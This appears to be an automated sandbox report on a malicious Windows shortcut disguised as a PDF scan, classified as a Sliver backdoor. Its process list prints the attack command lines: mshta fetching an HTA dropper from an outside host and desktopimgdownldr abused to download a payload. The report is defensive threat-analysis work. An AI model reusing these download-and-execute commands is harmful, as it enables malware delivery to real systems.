Overview

overview

10

Static

static

1

CC_scan.pd...ad.lnk

windows7-x64

10

CC_scan.pd...ad.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/11/2024, 15:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CC_scan.pdf.lnk.download.lnk

  • Size

    1KB

  • MD5

    95bfcc2eac48c76681aa2d97a5674201

  • SHA1

    f72d50b2bba6e479ec106ae2f6fe993ab6eef99a

  • SHA256

    f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478

  • SHA512

    952485dbd0096257ab62ef2fa684d1333fa1e495ad29d8e7a8aaa41d6b316abb48ca5ad2c1b704db7e5bc346a8350039a059c7d5ad323b072ecd3911ac4c5925

Score
10/10
sliverbackdoortrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://0day.works/a

Signatures

  • Sliver RAT v2 1 IoCs
  • Sliver family
    sliver
  • SliverRAT

    SliverRAT is an open source Adversary Emulation Framework.

    trojanbackdoorsliver
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\CC_scan.pdf.lnk.download.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3580
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://0day.works/a
      2⤵
      • Blocklisted process makes network request
      • Checks computer location settings
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:3672
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c set "SYSTEMROOT=C:\Windows\Temp" && desktopimgdownldr.exe /deskimgurl:https://0day.works/null /eventName:desktopimgdownldr
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2148
        • C:\Windows\system32\desktopimgdownldr.exe
          desktopimgdownldr.exe /deskimgurl:https://0day.works/null /eventName:desktopimgdownldr
          4⤵
            PID:4028
        • C:\Windows\Tasks\TapiUnattend.exe
          "C:\Windows\Tasks\TapiUnattend.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of WriteProcessMemory
          PID:2080
          • C:\Windows\System32\TapiUnattend.exe
            C:\Windows\System32\TapiUnattend.exe
            4⤵
              PID:4280

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Windows\Tasks\TapiUnattend.exe
        Filesize

        15KB

        MD5

        b574abf43dcc57a359129d1adb4cdda0

        SHA1

        6fb0f79d9a7f0108ff817ee418e3436cc51393b5

        SHA256

        6a960edad235f685e741e0f1a74d1162fd3cf410862192236f962ae289f0886e

        SHA512

        a82831945726b02e56a843288039d5770f926615dde410653eda33a90bdf00b5c9492dd8483d97f2798009e8f38453c3089853495e1af2a8276bba7ebce51b78

        Download Submit

      • memory/2080-19-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/2080-32-0x00007FFBEF060000-0x00007FFBF0B21000-memory.dmp

        Filesize

        26.8MB

        Download

      • memory/4280-20-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/4280-21-0x0000000307FC0000-0x00000003090C1000-memory.dmp

        Filesize

        17.0MB

        Download